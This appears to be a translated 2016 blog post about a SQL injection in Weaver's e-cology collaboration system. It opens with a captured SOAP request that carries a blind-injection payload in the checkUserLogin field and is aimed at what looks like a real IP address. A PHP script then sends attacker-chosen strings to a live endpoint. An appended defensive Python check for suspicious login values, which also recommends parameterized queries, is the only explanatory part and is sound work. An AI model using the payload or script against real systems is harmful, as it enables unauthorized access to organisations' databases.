
A SQL Injection in the Weaver (泛微) e-cology Collaborative Business System

April 19, 2016, 11:41 | Study notes | No comments | 1,023 views

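[Note: this article is the blogger's original work! If you repost it, please include a link to the original, at the very least in txt format!]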

POST /services/MobileService HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 708
Host: 220.248.212.93
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.services.weaver.com.cn" xmlns:urn2="http://workflow.webservices.mobile.weaver">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:checkUserLogin>
           <urn:in0>1'and length(user)=5 and 'a'='a</urn:in0>
           <urn:in1>1</urn:in1>
           <urn:in2>1</urn:in2>
        </urn:checkUserLogin>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Above is the captured request.

Below is the test script, which I bought for 6 points... so frustrating.

<?php
$in0=$_GET['name'];
#$in0 = $in0."' and 'a' = 'a";
header("content-type:text/html;charset=utf-8");
try {
$client = new SoapClient('http://e-cology.com.cn//services/MobileService?wsdl');
$xml = "
<SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:soap='http://schemas.xmlsoap.org/wsdl/soap/' xmlns:xsd='http://www.w3.org/1999/XMLSchema'  xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' xmlns:m0='http://tempuri.org/' xmlns:SOAP-ENC='http://schemas.xmlsoap.org/soap/encoding/' xmlns:urn='webservices.services.weaver.com.cn' xmlns:urn2='http://workflow.webservices.mobile.weaver'>
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:checkUserLogin>
           <urn:in0>1</urn:in0>
           <urn:in1>1</urn:in1>
           <urn:in2>1</urn:in2>
        </urn:checkUserLogin>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
$result=$client->checkUserLogin(array('in0'=>$in0,'in1'=>'123456','in2'=>1));
echo $result->out; // display the result
} catch (SOAPFault $e) {
print_r('Exception:'.$e);
}
?>
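
For defenders, the captured request above shows what to look for: a `checkUserLogin` call on `/services/MobileService` whose `in0` value is not a plain login identifier. The following is an added example, not code from the original post or from Weaver; the function name, the allowlist for valid identifiers and the sample envelope are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "webservices.services.weaver.com.cn"  # urn: namespace in the captured request
# Assumption: legitimate login identifiers are 1-64 word characters, '.', '@' or '-'.
ALLOWED_ID = re.compile(r"[\w.@-]{1,64}")
SQL_META = re.compile(r"['\";]|--|/\*|\b(and|or|union|select)\b", re.I)

def inspect_check_user_login(body):
    """Return findings for one SOAP body POSTed to /services/MobileService."""
    if "<!DOCTYPE" in body.upper():
        return ["DTD present: rejected before parsing"]  # avoid entity expansion
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed XML"]
    findings = []
    for call in root.iter("{%s}checkUserLogin" % SVC_NS):
        in0 = call.findtext("{%s}in0" % SVC_NS, default="")
        if not ALLOWED_ID.fullmatch(in0):
            reason = "SQL metacharacters" if SQL_META.search(in0) else "unexpected characters"
            findings.append("in0 rejected (%s): %r" % (reason, in0))
    return findings

# Constructed sample envelope, reduced to the namespaces the check needs.
ENVELOPE = (
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="%s" xmlns:urn="%s">'
    "<SOAP-ENV:Body><urn:checkUserLogin>"
    "<urn:in0>%%s</urn:in0><urn:in1>1</urn:in1><urn:in2>1</urn:in2>"
    "</urn:checkUserLogin></SOAP-ENV:Body></SOAP-ENV:Envelope>"
) % (SOAP_NS, SVC_NS)

if __name__ == "__main__":
    samples = ["zhangsan", "1'and length(user)=5 and 'a'='a"]  # second is the page's in0
    for value in samples:
        print(value, "->", inspect_check_user_login(ENVELOPE % value) or "ok")
```

A filter like this is a stopgap for log review or a gateway in front of the service; the durable fix is for the server to pass `in0` to the database as a bound parameter.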